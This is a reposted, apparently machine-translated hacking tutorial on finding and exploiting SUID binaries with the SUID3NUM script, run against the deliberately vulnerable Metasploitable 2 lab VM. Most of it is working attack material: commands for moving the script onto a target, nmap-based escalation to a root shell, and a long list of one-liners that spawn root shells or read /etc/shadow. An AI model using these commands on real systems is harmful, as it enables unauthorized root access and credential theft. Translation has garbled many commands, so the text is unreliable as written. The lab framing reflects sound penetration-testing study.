قالب وردپرس درنا توس
Home / Tips and Tricks / Search and use SUID binaries with SUID3NUM «Null Byte :: WonderHowTo

Search and use SUID binaries with SUID3NUM «Null Byte :: WonderHowTo



File permissions can become troublesome on Linux and can be a valuable way of attacking privilege escalation if things are not configured correctly. SUID binaries can often be an easy way to root, but searching through all the default settings can be a huge waste of time. Fortunately, there is a simple script that can fix things for us.

Let's first discuss SUID, which stands for Set User ID. It is a certain type of file permission in Linux, different from the usual read, write and execute permissions. A file is usually run with the rights of the user who started it. However, when the SUID bit is set, the file is executed with the owner's permission.

Problems arise when a program or file (often called binaries) is owned by root, but other users are allowed to run it. Depending on the binary file, specific commands can be executed that eventually result in a root shell. Bad for administrators, good for attackers.

SUID3NUM vs. other enumeration scripts

SUID3NUM, which we will use to take advantage of vulnerable SUID binaries, is a Python script that can find SUID binaries and distinguish between standard and custom and try to exploit them using the GTFOBins repository (GTFOBins is an impressive collection of Unix binaries that can be used for privilege escalation). It is a standalone script that works with both Python 2 and Python 3.

There are other bulleted scripts, such as the popular LinEnum, that will identify both standard and custom SUID binaries, but the problem is that they do not divorce . So unless you are an absolute expert on Unix binaries, it is possible to waste a lot of time trying to exploit the unused. This is where SUID3NUM really shines. When it finds a vulnerable binary file, it will display the commands or commands to exploit it, and it even has an option for automatic exploitation.

Recommended on Amazon: & # 39; Learning Linux Binary Analysis & # 39; by Ryan O'Neill [19659008] Below, we use Metasploitable 2, an intentionally vulnerable Ubuntu Linux virtual machine, as its target, and Kali Linux as our local machine.

Step 1: Get a reverse shell on the target

To use SUID3NUM, which is a post-exploitation enumeration script, we must first exploit the target system and get a shell. Sometimes web applications are vulnerable to command injection, causing misconfigurations that allow an attacker to execute OS commands on the server. We can easily abuse those scenarios to get an inverted shell. But there are many other ways to get an inverted shell.

Step 2: Getting SUID3NUM on target

The next step is to upgrade our limited shell to a fully interactive TTY session. Doing this will not only allow us to use tab completion and terminal history, but it will also make it a lot cleaner and easier to perform the necessary post exploitation steps. We also want to go to a writable folder, such as / var / tmp so that we can run our script without any problems.

Let's download SUID3NUM from GitHub on our local machine. An easy way to do that is to use the command wget :

  ~ # wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py

--2020-04-26 12: 22: 35-- https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com) ... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.148.133 |: 443 ... connected.
HTTP request sent pending reply ... 200 OK
Length: 12614 (12K) [text/plain]
Save to: "suid3num.py"

suid3num.py 100% [======================================================================================================================>] 12.32K --.- KB / s in 0.001s

2020-04-26 12:22:36 (16.1 MB / s) - & # 39; suid3num.py & # 39; saved [12614/12614]

Then we can use Python to start a standard HTTP server which we can use to transfer the script to the target. We assume that the target has limited internet access, so we have to put the script on it ourselves rather than just download it directly to the target.

Start the server with the following command:

  ~ # python -m SimpleHTTPServer

Control HTTP on 0.0.0.0 port 8000 ... 

Back in the shell we have on the target, we can retrieve the file again with wget this time with the correct IP address and port: [19659014] www-data @ metasploitable: / var / tmp $ wget http://10.10.0.1:8000/suid3num.py

–14: 19: 06– http://10.10.0.1:8000/suid3num.py
=> `suid3num.py & # 39;
Connect to 10.10.0.1:8000 … connected.
HTTP request sent pending reply … 200 OK
Length: 12,614 (12K) [text/plain]

100% [=========================================================================================================================================================================>] 12,614 -. – K / s

14:19:06 (65.16 MB / s) – `suid3num.py & # 39; saved [12614/12614]

We should see the GET request on our local machine, indicating that the transfer was successful:

  ~ # python -m SimpleHTTPServer

Operating HTTP on 0.0.0.0 port 8000 ...
10.10.0.50 - - [26/Apr/2020 12:24:53] "GET /suid3num.py HTTP / 1.0" 200 - 

Right now we can kill the Python server because we don't need it anymore.

Step 3: Using SUID3NUM to find SUID bins

To run SUID3NUM on the target, simply use the command python . Then we can see that the script returns the results to us in different sections:

  www-data @ metasploitable: / var / tmp $ python suid3num.py

___ _ _ _ ___ _____ _ _ _ __ __
/ __ | | | / |  | __ /  | | | | |  / |
 __  | _ | | | |) | | _  .` | | _ | | |  / | |
| ___ /  ___ / | _ | ___ / | ___ / _ |  _ |  ___ / | _ | | _ | github @ Anon-Exploiter

[#] Search / display all SUID binaries.
------------------------------
/ bin / umount
/ bin / fusermount
/ bin / su
/ bin / mount
/ bin / ping
/ bin / ping 6
/sbin/mount.nfs
/ lib / dhcp3-client / call-dhclient-script
/ usr / bin / sudoedit
/ usr / bin / X
/ usr / bin / netkit-rsh
/ usr / bin / gpasswd
/usr/bin/traceroute6.iputils
/ usr / bin / sudo
/ usr / bin / netkit-rlogin
/ usr / bin / arping
/ usr / bin / at
/ usr / bin / newgrp
/ usr / bin / chfn
/ usr / bin / nmap
/ usr / bin / chsh
/ usr / bin / netkit-rcp
/ usr / bin / passwd
/ usr / bin / mtr
/ usr / sbin / uuidd
/ usr / sbin / pppd
/ usr / lib / telnetlogin
/ usr / lib / apache2 / suexec
/ usr / lib / eject / dmcrypt-get-device
/ usr / lib / openssh / ssh-keysign
/ usr / lib / pt_chown
------------------------------

[!] Standard binaries (don't bother)
------------------------------
/ bin / umount
/ bin / fusermount
/ bin / su
/ bin / mount
/ bin / ping
/ bin / ping 6
/sbin/mount.nfs
/ usr / bin / gpasswd
/usr/bin/traceroute6.iputils
/ usr / bin / sudo
/ usr / bin / arping
/ usr / bin / at
/ usr / bin / newgrp
/ usr / bin / chfn
/ usr / bin / chsh
/ usr / bin / passwd
/ usr / sbin / pppd
/ usr / lib / eject / dmcrypt-get-device
/ usr / lib / openssh / ssh-keysign
------------------------------

[~] Custom SUID binaries (interesting stuff)
------------------------------
/ lib / dhcp3-client / call-dhclient-script
/ usr / bin / sudoedit
/ usr / bin / X
/ usr / bin / netkit-rsh
/ usr / bin / netkit-rlogin
/ usr / bin / nmap
/ usr / bin / netkit-rcp
/ usr / bin / mtr
/ usr / sbin / uuidd
/ usr / lib / telnetlogin
/ usr / lib / apache2 / suexec
/ usr / lib / pt_chown
------------------------------

[#] SUID Binaries in list of GTFO boxes (Hell Yeah!)
------------------------------
/ usr / bin / nmap - ~> https://gtfobins.github.io/gtfobins/nmap/#suid
------------------------------

[#] Exploit
------------------------------
[&] Nmap
& # 39; & # 39;
TF = $ (mktemp)
echo & # 39; os.execute ("/ bin / sh") & # 39;> $ TF
/ usr / bin / nmap --script = $ TF
& # 39; & # 39;

------------------------------

[$] Try the command (s) below to use the SUID bins found !!!
------------------------------
------------------------------

[-] Note
------------------------------
If you see an FP in the output, please report it to make the script better! 🙂 

The first section contains all SUID binaries found on the system. The next section contains the default binaries, with a note that we shouldn't be bothered. The next section contains custom binaries and that's where things might get interesting. The last section lists binary files that are part of the list of GTFOBins, which means that there is a high probability that they can be exploited.

It then gives us the command or commands to exploit all promising SUID binaries. Let's try. First set the variable:

  www-data @ metasploitable: / var / tmp $ TF = $ (mktemp) 

Then add the command to run a shell:

  www-data @ metasploitable: / var / tmp $ echo & # 39; os.execute ("/ bin / sh") & # 39;> $ TF 

And finally run the binary (Nmap) with the script option set to our variable. Note that I had to add localhost to the command otherwise it wouldn't work properly:

  www-data @ metasploitable: / var / tmp $ / usr / bin / nmap localhost - script = $ TF

Nmap 4.53 (http://insecure.org) starting on 2020-04-26 14:45 EDT
SCRIPT ENGINE: Warning: & # 39; /tmp/tmp.FrEHDD5051' loading - the recommended file extension is & # 39; .nse & # 39 ;.
sh-3.2 # 

It works and it looks like we're getting a root shell. We can use the whoami command to verify:

  sh-3.2 # whoami

root 

Step 4: Add custom commands to SUID3NUM

We can customize the SUID3NUM script by including custom binaries to look for and commands to run. Let's edit the script with the nano editor:

  www-data @ metasploitable: / var / tmp $ nano suid3num.py 

Find the section that looks like this, with the commands used for SUID binary exploitation:

  "" "
Automatic operation of SUID bins - list
"" "

suidExploitation = {
& # 39; tasket & # 39 ;: & # 39; 1 / bin / sh -p & # 39 ;,
& # 39; gdb & # 39 ;: & # 39; -q -nx -ex  & # 39; python import os; os.execl ("/ bin / sh", "sh", "-p")  & # 39; -ex stop & # 39 ;,
& # 39; bash & # 39 ;: & # 39; -p & # 39 ;,
& # 39; busybox & # 39 ;: & # 39; sh & # 39 ;,
& # 39; cat & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; cut & # 39 ;: & # 39; -d "" -f1 / etc / shadow & # 39 ;,
& # 39; dash & # 39 ;: & # 39; -p & # 39 ;,
& # 39; docker & # 39 ;: & # 39; run -v /: / mnt --rm -it alpine chroot / mnt sh & # 39 ;,
& # 39; env & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; expand & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; expect & # 39 ;: & # 39; -c "spawn / bin / sh -p; interaction" & # 39 ;,
& # 39; find & # 39 ;: & # 39 ;. -exec / bin / sh -p \; -stop & # 39 ;,
& # 39; flock & # 39 ;: & # 39; -u / / bin / sh -p & # 39 ;,
& # 39; fold & # 39 ;: & # 39; -w99999999 / etc / shadow & # 39 ;,
& # 39; grep & # 39 ;: & # 39; "" / etc / shadow & # 39 ;,
& # 39; head & # 39 ;: & # 39; -c2G / etc / shadow & # 39 ;,
& # 39; ionice & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; jrunscript & # 39 ;: & # 39; -e "exec ( & # 39; / bin / sh -pc \ $ @ | sh \ $ {IFS} -p _ echo sh -p <$(tty) > $ (tty) 2> $ (tty)  & # 39;) "& # 39 ;,
& # 39; ksh & # 39 ;: & # 39; -p & # 39 ;,
& # 39; ld.so & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; less & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; logsave & # 39 ;: & # 39; / dev / null / bin / sh -i -p & # 39 ;,
& # 39; make & # 39 ;: & # 39; -s --eval = $  & # 39; x: \ n \ t -  & # 39; "/ bin / sh -p" & # 39 ;,
& # 39; more & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; nice & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; nl & # 39 ;: & # 39; -bn -w1 -s & # 39; & # 39; / etc / shadow & # 39 ;,
& # 39; node & # 39 ;: & # 39; node -e  & # 39; require ("child_process"). spawn ("/ bin / sh", ["-p"] {stdio: [0, 1, 2]});  & # 39; & # 39 ;,
& # 39; od & # 39 ;: & # 39; od -An -c -w9999 / etc / shadow | sed -E -e  & # 39; s / // g  & # 39; -e  & # 39; s / \\ n / \ n / g  & # 39; & # 39 ;,
& # 39; perl & # 39 ;: & # 39; -e  & # 39; exec "/ bin / sh";  & # 39; & # 39 ;,
& # 39; pg & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; php & # 39 ;: & # 39; -r "pcntl_exec ( & # 39; / bin / sh  & # 39 ;, ['-p']);" & # 39 ;,
& # 39; python & # 39 ;: & # 39; -c  & # 39; import os; os.execl ("/ bin / sh", "sh", "-p")  & # 39; & # 39 ;,
& # 39; rlwrap & # 39 ;: & # 39; -H / dev / null / bin / sh -p & # 39 ;,
& # 39; rpm & # 39 ;: & # 39; - eval  & # 39;% {lua: os.execute ("/ bin / sh", "-p")}  & # 39; & # 39 ;,
& # 39; rpmquery & # 39 ;: & # 39; - eval  & # 39;% {lua: posix.exec ("/ bin / sh", "-p")}  & # 39; & # 39 ;,
& # 39; rsync & # 39 ;: & # 39; -e  & # 39; sh -p -c "sh 0 <&2 1> & 2"  & # 39; 127.0.0.1: / dev / null & # 39 ;,
& # 39; run-parts & # 39 ;: & # 39; - new-session --regex  & # 39; ^ sh $  & # 39; / bin --arg =  & # 39; - p  & # 39; & # 39 ;,
& # 39; rvim & # 39 ;: & # 39; -c  & # 39 ;: py import os; os.execl ("/ bin / sh", "sh", "-pc", "reset; exec sh -p")  & # 39; & # 39 ;,
& # 39; sed & # 39 ;: & # 39; -e "" / etc / shadow & # 39 ;,
& # 39; setarch & # 39 ;: & # 39; $ (arch) / bin / sh -p & # 39 ;,
& # 39; sort & # 39 ;: & # 39; -m / etc / shadow & # 39 ;,
& # 39; start-stop-daemon & # 39 ;: & # 39; -n $ RANDOM -S -x / bin / sh - -p & # 39 ;,
& # 39; stdbuf & # 39 ;: & # 39; -i0 / bin / sh -p & # 39 ;,
& # 39; strace & # 39 ;: & # 39; -o / dev / null / bin / sh -p & # 39 ;,
& # 39; tail & # 39 ;: & # 39; -c2G / etc / shadow & # 39 ;,
& # 39; time & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; timeout & # 39 ;: & # 39; 7d / bin / sh -p & # 39 ;,
& # 39; ul & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; unpand & # 39 ;: & # 39; unpand -t99999999 / etc / shadow & # 39 ;,
& # 39; uniq & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; unshare & # 39 ;: & # 39; -r / bin / sh & # 39 ;,
& # 39; vim & # 39 ;: & # 39; -c  & # 39 ;: py import os; os.execl ("/ bin / sh", "sh", "-pc", "reset; exec sh -p")  & # 39; & # 39 ;,
& # 39; watch & # 39 ;: & # 39; -x sh -c  & # 39; reset; exec sh 1> & 0 2> & 0  & # 39; & # 39 ;,
& # 39; xargs & # 39 ;: & # 39; -a / dev / null sh -p & # 39 ;,
& # 39; xxd & # 39 ;: & # 39; / etc / shadow | xxd -r & # 39;
} 

There is an easier way to use the Nmap binary with just one line as opposed to the three from earlier. The – interactive option available in earlier versions of Nmap allowed OS commands to be run from the interactive prompt. The problem was that it was running as root, so all an attacker had to do was run the command to generate a root shell.

Add this line to the section with commands in the script:

  & # 39; nmap & # 39 ;: & # 39; - -interactive & # 39 ;, 

Press Control-X Y and Enter to save the file. Now when we run SUID3NUM in automatic exploitation mode, with the flag -e it will attempt to exploit vulnerable SUID binaries it automatically finds:

  www-data @ metasploitable: / var / tmp $ python suid3num.py -e

___ _ _ _ ___ _____ _ _ _ __ __
/ __ | | | / |  | __ /  | | | | |  / |
 __  | _ | | | |) | | _  .` | | _ | | |  / | |
| ___ /  ___ / | _ | ___ / | ___ / _ |  _ |  ___ / | _ | | _ | github @ Anon-Exploiter

[#] Search / display all SUID binaries.
------------------------------
/ bin / umount
/ bin / fusermount
/ bin / su
/ bin / mount
/ bin / ping
/ bin / ping 6
/sbin/mount.nfs
/ lib / dhcp3-client / call-dhclient-script
/ usr / bin / sudoedit
/ usr / bin / X
/ usr / bin / netkit-rsh
/ usr / bin / gpasswd
/usr/bin/traceroute6.iputils
/ usr / bin / sudo
/ usr / bin / netkit-rlogin
/ usr / bin / arping
/ usr / bin / at
/ usr / bin / newgrp
/ usr / bin / chfn
/ usr / bin / nmap
/ usr / bin / chsh
/ usr / bin / netkit-rcp
/ usr / bin / passwd
/ usr / bin / mtr
/ usr / sbin / uuidd
/ usr / sbin / pppd
/ usr / lib / telnetlogin
/ usr / lib / apache2 / suexec
/ usr / lib / eject / dmcrypt-get-device
/ usr / lib / openssh / ssh-keysign
/ usr / lib / pt_chown
------------------------------

[!] Standard binaries (don't bother)
------------------------------
/ bin / umount
/ bin / fusermount
/ bin / su
/ bin / mount
/ bin / ping
/ bin / ping 6
/sbin/mount.nfs
/ usr / bin / gpasswd
/usr/bin/traceroute6.iputils
/ usr / bin / sudo
/ usr / bin / arping
/ usr / bin / at
/ usr / bin / newgrp
/ usr / bin / chfn
/ usr / bin / chsh
/ usr / bin / passwd
/ usr / sbin / pppd
/ usr / lib / eject / dmcrypt-get-device
/ usr / lib / openssh / ssh-keysign
------------------------------

[~] Custom SUID binaries (interesting stuff)
------------------------------
/ lib / dhcp3-client / call-dhclient-script
/ usr / bin / sudoedit
/ usr / bin / X
/ usr / bin / netkit-rsh
/ usr / bin / netkit-rlogin
/ usr / bin / nmap
/ usr / bin / netkit-rcp
/ usr / bin / mtr
/ usr / sbin / uuidd
/ usr / lib / telnetlogin
/ usr / lib / apache2 / suexec
/ usr / lib / pt_chown
------------------------------

[#] SUID Binaries in list of GTFO boxes (Hell Yeah!)
------------------------------
/ usr / bin / nmap - ~> https://gtfobins.github.io/gtfobins/nmap/#suid
------------------------------

[#] Exploit
------------------------------
------------------------------

[$] Auto exploitation of SUID bit binaries !!!
------------------------------

[#] Execute command ...
[~] / usr / bin / nmap - interactive

Start Nmap V. 4.53 (http://insecure.org)
Welcome to interactive mode - press h  for help
nmap> 

The only caveat to that specific command is that there is no way to automatically run OS commands once we have fallen into Nmap's interactive shell. In that case it is not fully automatic, but different SUID binaries will yield different results.

From the interactive prompt, simply enter ! Sh in to generate a shell:

  nmap>! Sh

sh-3.2 # 

And since it is running as root, we now have a root shell:

  sh-3.2 # whoami

root 

Completion

Today we learned a bit about SUID binaries and how they can be exploited for privilege escalation on Linux systems. We used a script called SUID3NUM to find problematic binaries on the target and even modified it to try automatic exploitation. SUID3NUM is a useful script that can reduce the time required to identify vulnerable SUID binaries during post-exploitation.

Want to start making money as a white hat hacker? Start your White Hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from Ethical Hacking Professionals.

Buy Now (96% Off)>

Cover Image and Screenshots by drd_ / Null-byte

Source link